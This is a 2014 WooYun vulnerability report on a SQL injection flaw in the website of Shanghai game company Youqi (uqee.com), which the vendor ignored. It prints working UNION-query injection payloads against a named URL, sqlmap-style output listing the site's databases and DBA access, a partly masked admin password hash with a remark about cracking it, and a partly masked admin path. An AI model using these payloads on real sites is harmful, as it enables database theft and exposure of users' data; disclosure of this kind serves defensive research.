漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-082024
漏洞标题:游奇网SQL注射可导致全站数据库泄漏
相关厂商:上海游奇网络有限公司
漏洞作者: 路人甲
提交时间:2014-11-05 10:31
修复时间:2014-11-10 10:32
公开时间:2014-11-10 10:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-11-05: 细节已通知厂商并且等待厂商处理中
2014-11-10: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
又一次。
全站的用户。。。要是被非法脱了。。。。。后果。。。。
详细说明:
参看: WooYun: 游奇网络漏洞可导致服务器沦陷
具体沦陷服务器的步骤就不说了。
漏洞证明:
管理员的密码密文:
查了下
查询结果:
已加入本站后台破解,完成进度:29% 不出意外时间问题了吧。。。
http://www.uqee.com:80/Jobs/info/index/info_id/1%20AND%203*2*1%3d6%20AND%20668%3d668 (GET)
Place: URI
Parameter: #2*
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: http://www.uqee.com:80/Jobs/info/index/info_id/-1563 UNION ALL SELECT CONCAT(0x7173796171,0x754161774c6e654b4e7a,0x7178706971),NULL,NULL,NULL,NULL,NULL,NULL#1=6 AND 668=668
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: http://www.uqee.com:80/Jobs/info/index/info_id/-8636 UNION ALL SELECT NULL,CONCAT(0x7173796171,0x48776c59587545596567,0x7178706971),NULL,NULL,NULL,NULL,NULL#21=6 AND 668=668
---
web application technology: Nginx
available databases [6]:
[*] information_schema
[*] mysql
[*] newidc
[*] newuqeebbs
[*] uqee
[*] uqeecms
Database: uqee : [112 tables]
Database: uqeecms : [136 tables]
Database: newuqeebbs : [314 tables]
current user is DBA: True
管理的账号:admi** ,25cc894***c454146a3ca28f19346,salt:******
后台地址:/*/admin/admin
多余信息不贴出来了。
修复方案:
双11快到了,能送个妹子不?
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-11-10 10:32
厂商回复:
最新状态:
暂无